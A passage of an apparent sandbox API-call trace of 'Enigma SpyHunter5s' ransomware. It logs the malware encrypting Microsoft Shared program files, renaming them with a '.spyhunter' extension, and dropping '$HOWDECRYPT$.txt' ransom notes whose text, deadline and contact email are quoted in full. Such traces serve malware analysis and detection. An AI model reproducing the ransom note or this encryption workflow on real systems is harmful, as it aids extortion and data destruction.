files\\microsoft shared\\dw\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0084.880] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0084.880] WriteFile (in: hFile=0xcc, lpBuffer=0x270fdf7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ff20, lpOverlapped=0x0 | out: lpBuffer=0x270fdf7*, lpNumberOfBytesWritten=0x270ff20*=0x127, lpOverlapped=0x0) returned 1 [0084.880] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0084.880] WriteFile (in: hFile=0xcc, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ff20, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ff20*=0x2ac, lpOverlapped=0x0) returned 1 [0084.881] CloseHandle (hObject=0xcc) returned 1 [0084.881] GetProcessHeap () returned 0x2c0000 [0084.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3242d8 | out: hHeap=0x2c0000) returned 1 [0084.881] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fec0 | out: pbBuffer=0x270fec0) returned 1 [0084.881] GetProcessHeap () returned 0x2c0000 [0084.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0084.881] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270feb8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270feb8*=0x30) returned 1 [0084.881] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0084.911] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 66 [0084.911] StrStrW (lpFirst="DWTRIG20.EXE", lpSrch=".txt") returned 0x0 [0084.911] GetProcessHeap () returned 0x2c0000 [0084.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x33efe8 [0084.911] ReadFile (in: hFile=0xd0, lpBuffer=0x33efe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe7c, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesRead=0x270fe7c*=0x2800, lpOverlapped=0x0) returned 1 [0085.267] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.267] WriteFile (in: hFile=0xd0, lpBuffer=0x33efe8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe7c, lpOverlapped=0x0 | out: lpBuffer=0x33efe8*, lpNumberOfBytesWritten=0x270fe7c*=0x2800, lpOverlapped=0x0) returned 1 [0085.267] GetProcessHeap () returned 0x2c0000 [0085.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0085.267] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.267] WriteFile (in: hFile=0xd0, lpBuffer=0x270febc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe7c, lpOverlapped=0x0 | out: lpBuffer=0x270febc*, lpNumberOfBytesWritten=0x270fe7c*=0x4, lpOverlapped=0x0) returned 1 [0085.285] WriteFile (in: hFile=0xd0, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe7c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe7c*=0x30, lpOverlapped=0x0) returned 1 [0085.285] CloseHandle (hObject=0xd0) returned 1 [0085.297] GetProcessHeap () returned 0x2c0000 [0085.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0085.297] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.spyhunter") returned 76 [0085.297] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.spyhunter")) returned 1 [0085.393] GetProcessHeap () returned 0x2c0000 [0085.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0085.393] GetProcessHeap () returned 0x2c0000 [0085.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0085.393] GetProcessHeap () returned 0x2c0000 [0085.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d2b8 | out: hHeap=0x2c0000) returned 1 [0085.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270feb8 | out: pbBuffer=0x270feb8) returned 1 [0085.393] GetProcessHeap () returned 0x2c0000 [0085.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0085.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270feb0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270feb0*=0x30) returned 1 [0085.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0085.628] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP") returned 72 [0085.628] StrStrW (lpFirst="EQNEDT32.HLP", lpSrch=".txt") returned 0x0 [0085.628] GetProcessHeap () returned 0x2c0000 [0085.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x36f8c0 [0085.629] ReadFile (in: hFile=0x15c, lpBuffer=0x36f8c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x36f8c0*, lpNumberOfBytesRead=0x270fe74*=0x2800, lpOverlapped=0x0) returned 1 [0085.720] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.720] WriteFile (in: hFile=0x15c, lpBuffer=0x36f8c0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x36f8c0*, lpNumberOfBytesWritten=0x270fe74*=0x2800, lpOverlapped=0x0) returned 1 [0085.721] GetProcessHeap () returned 0x2c0000 [0085.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x36f8c0 | out: hHeap=0x2c0000) returned 1 [0085.721] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.721] WriteFile (in: hFile=0x15c, lpBuffer=0x270feb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x270feb4*, lpNumberOfBytesWritten=0x270fe74*=0x4, lpOverlapped=0x0) returned 1 [0085.722] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe74*=0x30, lpOverlapped=0x0) returned 1 [0085.722] CloseHandle (hObject=0x15c) returned 1 [0085.725] GetProcessHeap () returned 0x2c0000 [0085.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0085.725] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.spyhunter") returned 82 [0085.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.HLP.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.hlp.spyhunter")) returned 1 [0085.726] GetProcessHeap () returned 0x2c0000 [0085.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0085.727] GetProcessHeap () returned 0x2c0000 [0085.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0085.727] GetProcessHeap () returned 0x2c0000 [0085.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3303d8 | out: hHeap=0x2c0000) returned 1 [0085.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270feb8 | out: pbBuffer=0x270feb8) returned 1 [0085.727] GetProcessHeap () returned 0x2c0000 [0085.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0085.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270feb0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270feb0*=0x30) returned 1 [0085.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0085.768] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0085.768] StrStrW (lpFirst="msgfilt.dll", lpSrch=".txt") returned 0x0 [0085.768] GetProcessHeap () returned 0x2c0000 [0085.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x344078 [0085.768] ReadFile (in: hFile=0xd0, lpBuffer=0x344078, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x344078*, lpNumberOfBytesRead=0x270fe74*=0x2800, lpOverlapped=0x0) returned 1 [0086.054] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.054] WriteFile (in: hFile=0xd0, lpBuffer=0x344078*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x344078*, lpNumberOfBytesWritten=0x270fe74*=0x2800, lpOverlapped=0x0) returned 1 [0086.054] GetProcessHeap () returned 0x2c0000 [0086.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x344078 | out: hHeap=0x2c0000) returned 1 [0086.054] SetFilePointerEx (in: hFile=0xd0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.054] WriteFile (in: hFile=0xd0, lpBuffer=0x270feb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x270feb4*, lpNumberOfBytesWritten=0x270fe74*=0x4, lpOverlapped=0x0) returned 1 [0086.111] WriteFile (in: hFile=0xd0, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fe74, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x270fe74*=0x30, lpOverlapped=0x0) returned 1 [0086.111] CloseHandle (hObject=0xd0) returned 1 [0086.344] GetProcessHeap () returned 0x2c0000 [0086.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373f88 [0086.345] wnsprintfW (in: pszDest=0x373f88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.spyhunter") returned 80 [0086.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.spyhunter")) returned 1 [0086.487] GetProcessHeap () returned 0x2c0000 [0086.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373f88 | out: hHeap=0x2c0000) returned 1 [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3243b0 | out: hHeap=0x2c0000) returned 1 [0086.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270feb0 | out: pbBuffer=0x270feb0) returned 1 [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fea8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fea8*=0x30) returned 1 [0086.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickLearningWizard.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flicklearningwizard.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372870 | out: hHeap=0x2c0000) returned 1 [0086.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270feb0 | out: pbBuffer=0x270feb0) returned 1 [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fea8*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fea8*=0x30) returned 1 [0086.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.489] GetProcessHeap () returned 0x2c0000 [0086.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384aa0 | out: hHeap=0x2c0000) returned 1 [0086.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd0 [0086.490] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.490] WriteFile (in: hFile=0xd0, lpBuffer=0x270fddf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ff08, lpOverlapped=0x0 | out: lpBuffer=0x270fddf*, lpNumberOfBytesWritten=0x270ff08*=0x127, lpOverlapped=0x0) returned 1 [0086.490] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.490] WriteFile (in: hFile=0xd0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ff08, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ff08*=0x2ac, lpOverlapped=0x0) returned 1 [0086.491] CloseHandle (hObject=0xd0) returned 1 [0086.491] GetProcessHeap () returned 0x2c0000 [0086.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x372788 | out: hHeap=0x2c0000) returned 1 [0086.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fea8 | out: pbBuffer=0x270fea8) returned 1 [0086.491] GetProcessHeap () returned 0x2c0000 [0086.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fea0*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fea0*=0x30) returned 1 [0086.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.847] GetProcessHeap () returned 0x2c0000 [0086.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.847] GetProcessHeap () returned 0x2c0000 [0086.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3726a0 | out: hHeap=0x2c0000) returned 1 [0086.847] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fea0 | out: pbBuffer=0x270fea0) returned 1 [0086.847] GetProcessHeap () returned 0x2c0000 [0086.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0086.847] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x270fe98*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x270fe98*=0x30) returned 1 [0086.847] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0086.866] GetProcessHeap () returned 0x2c0000 [0086.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0086.866] GetProcessHeap () returned 0x2c0000 [0086.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x370aa0 | out: hHeap=0x2c0000) returned 1 [0086.866] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\numbers\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\numbers\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.940] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.940] WriteFile (in: hFile=0x15c, lpBuffer=0x270fdd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fefc, lpOverlapped=0x0 | out: lpBuffer=0x270fdd3*, lpNumberOfBytesWritten=0x270fefc*=0x127, lpOverlapped=0x0) returned 1 [0086.940] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0086.940] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fefc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fefc*=0x2ac, lpOverlapped=0x0) returned 1 [0086.941] CloseHandle (hObject=0x15c) returned 1 [0086.941] GetProcessHeap () returned 0x2c0000 [0086.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x383b50 | out: hHeap=0x2c0000) returned 1 [0086.941] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\it-IT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.941] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0086.941] WriteFile (in: hFile=0x15c, lpBuffer=0x270fdcf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fef8, lpOverlapped=0x0 | out: lpBuffer=0x270fdcf*, lpNumberOfBytesWritten=0x270fef8*=0x127, lpOverlapped=0x0) returned 1 [0086.942] lstrlenA 